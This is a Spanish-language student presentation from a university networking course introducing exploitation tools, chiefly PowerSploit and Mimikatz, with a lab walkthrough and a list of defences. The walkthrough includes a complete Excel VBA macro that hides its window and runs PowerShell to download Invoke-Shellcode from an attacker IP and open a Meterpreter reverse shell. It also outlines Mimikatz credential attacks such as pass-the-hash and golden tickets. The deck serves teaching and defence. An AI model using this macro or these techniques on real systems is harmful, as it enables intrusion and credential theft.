1. Universidad Nacional Micaela Bastidas de Apurímac
FACULTAD DE INGENÍERA
ESCUELAACADÉMICO PROFESIONAL DE INGENIERÍA INFORMÁTICA Y SISTEMAS
HERRAMIENTAS DE EXPLOTACION -
POWERSPLOIT - MIMIKATS
CURSO : Administración de Redes
DOCENTE : Ing. Elvio Tintaya Zegarra
ESTUDIANTES : Alvites León Melitza Graciela
: Cruz Camero Tatiana Ruby
: Gonzales Huamani Yulissa
: Zeilú Massiel Moreano Falcón
: Pedro Luis Ninamanco Pizarro
2. HERRAMIENTAS DE
EXPLOTACIÓN
Son herramientas que se utilizan para crear
espacios de trabajo de seguridad para pruebas
de vulnerabilidad y sistemas de prueba de
penetración. Es un software completamente
de código abierto y fácil de usar.
2
¿Qué son las herramientas de explotación en Kali Linux?
3. ¿Qué son las herramientas de explotación?
3
Son programas y scripts de
computadora que lo ayudan a
encontrar y aprovechar las
debilidades en los sistemas
informáticos, aplicaciones web,
servidores y redes.
4. ¿ Cuáles son herramientas de
explotación ?
• MetaSploit
• Msfpayload
• Searchsploit
• Social engineering toolkit (root)
• sqlmap
5. Herramientas post – explotación
Determinar el valor de la máquina comprometida y mantener el control de la
máquina para su uso posterior. El valor de la máquina está determinado por la
sensibilidad de los datos almacenados en ella y la utilidad de la máquina para
comprometer aún más la red..
⬥ backdoor-factory
⬥ bdfproxy
⬥ intersect
⬥ nishang
⬥ powersploit
⬥ proxychains
7. “
“PowerSploit'' es una colección de
módulos de Microsoft PowerShell que
se pueden usar para ayudar a los
evaluadores de penetración durante
todas las fases de una evaluación.
PowerSploit se compone de los
siguientes módulos y scripts”
– MATT GRAEBER
7
8. VISION GENERAL
Es una herramienta que trata de una
colección de utilidades que van a
ser de gran interés para nuestros
pentests. Cuenta con muchos
módulos con distintos fines:
ejecución de código, modificación
de sripts, persistencia, exfiltración,
bypass de antivirus, elevación de
privilegios, etc.
Recuperado de: https://www.boomernix.com/2019/01/powersploit-windows-
hacking.html#:~:text=Se%20trata%20de%20una%20colecci%C3%B3n,%2C%20elevaci%C3%B3n%20de%20privilegios%
2C%20etc. 8
PowerSploit es una colección
de módulos de Microsoft
Powershell, que pueden ser
utilizados por los pentesters
durante toda la fase del
mismo.
9. Características:
⬥ Permite al usuario ejecutar
scripts en el sistema de destino
⬥ Omitir antivirus
⬥ Extraer datos de la máquina de
destino
⬥ Escuche el micrófono de la
máquina de destino
9
13. 13
Licencia:
⬥ El proyecto PowerSploit y todos los scripts
individuales están bajo la licencia BSD de 3
cláusulas, a menos que se indique explícitamente lo
contrario.
15. PASOS:
1. Creamos una Carpeta por ejemplo que se llame «PowerSploit
1. Abrimos la consola y ejecutamos «git clone
https://github.com/mattifestation/PowerSploit.git»
15
16. 16
3. Nos vamos a la carpeta que se acaba de descargar y entramos a la que se llama
«CodeExcution» y copiamos al HOME el archivo que se llama «Invoke–Shellcode.ps1»
17. 17
4. Abrimos la Consola de Metasploit , ejecutamos el multi handler y configuramos con la IP del
atacante, usamos ExitOnSession luego que se nos cierra el puerto de la víctima continúa abierto
y exploit –j para correr en background, algo así:
18. 18
5. Eso no tocamos más… ahora es tiempo de copiar la macro en un Excel y enviar a la maquina
virtual VICTIMA, amigo no te olvides de cambiar las ip
Public Function Execute() As Variant
Const HIDDEN_WINDOW = 0
strComputer = «.»
Set objWMIService = GetObject(«winmgmts:» & strComputer & «rootcimv2»)
Set objStartup = objWMIService.Get(«Win32_ProcessStartup»)
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
Set objProcess = GetObject(«winmgmts:» & strComputer & «rootcimv2:Win32_Process»)
objProcess.Create «powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -noprofile -noexit -c IEX
((New-Object Net.WebClient).DownloadString(‘http://192.168.116.131/Invoke–Shellcode.ps1′)); Invoke-
Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.116.131
-Lport 4444 -Force», Null, objConfig, intProcessID
End Function
19. 19
6. Abrimos otra Shell y buscamos el archivo «Invoke- – Shellcode.ps1» y le damos permiso de
ejecución de la siguiente manera:
7. Luego ejecutamos «Python –m SimpleHTTPServer 80«
8. Abrimos el EXCEL en la maquina VICTIMA
20. 20
9. En la consola que ejecutamos el
SImpleHTTPServer vamos a ver algo así…
Y en la consola de Metasploit vamos a tener algo
así:
Ya tendríamos una sesión de Meterpreter activa!!
21. 21
⬥ Para usar el módulo, escriba lo siguiente en la
ventana de PowerShell:
Import-Module PowerSploit
⬥ Para enumerar los comandos importados, escriba:
Get-Command-Module PowerSploit
⬥ Para obtener ayuda sobre cada comando, ejecute:
Get-Help
USO:
26. Historia
26
Delpy descubrió el defecto WDigest en la autenticación de Windows
en 2011, pero Microsoft lo descartó cuando informó de la
vulnerabilidad. En respuesta, creó Mimikatz, escrito en C, y lanzó el
binario a Internet, donde rápidamente ganó popularidad entre los
investigadores de seguridad, sin mencionar la atención no deseada
de los gobiernos de todo el mundo, lo que resultó en la eventual
liberación del código fuente en GitHub.
27. Mimikatz es una aplicación de
código abierto que permite a los
usuarios manipular las credenciales
de autenticación en los sistemas
Windows. Creado para funcionar
como una herramienta de prueba de
concepto para la seguridad de
Windows, los piratas informáticos
han utilizado Mimikatz para
comprometer muchos tipos
diferentes de sistemas.
27
29. Mimikatz puede utilizar técnicas para
recopilar credenciales.
⬥ PASS-THE-TICKET
Los datos de contraseña
de un usuario en Windows
se guardan en los llamados
Tickets Kerberos ⬥ KERBEROS GOLDEN
TICKET
Este es un ataque tipo Pass
the Ticket. Este ticket
corresponde a una cuenta
oculta llamada KRBTGT
29
⬥ KERBEROS SILVER
TICKET
Kerberos otorga un ticket
TGS a un usuario y este
puede utilizarlo para
conectarse a cualquier
servicio de la red.
30. 30
⬥ PASS-THE-CACHE
También podría entrar en la
clasificación de ataques tipo Pass the
Ticket. La única diferencia es que en
este caso; Mimikatz utiliza los datos
de conexión grabados y cifrados de
un sistema Mac/UNIX/Linux.
⬥ PASS-THE-HASH
No importa si el atacante no
tiene acceso a la contraseña
en texto plano, del dispositivo
al que quiere saber. Con
Mimikatz, el hacker puede
usar los hashes NTLM para
autenticarse y acceder al
sistema.
Mimikatz puede utilizar técnicas para
recopilar credenciales.
31. Pasos para la protección contra Mimikatz
⬥ Vigilancia Actualizaciones Mimikatz
⬥ Deshabilitar WDigest
⬥ Protección LSA
⬥ Debug privilege
⬥ Caché de credenciales
⬥ EDR IA Estática y de Comportamiento
31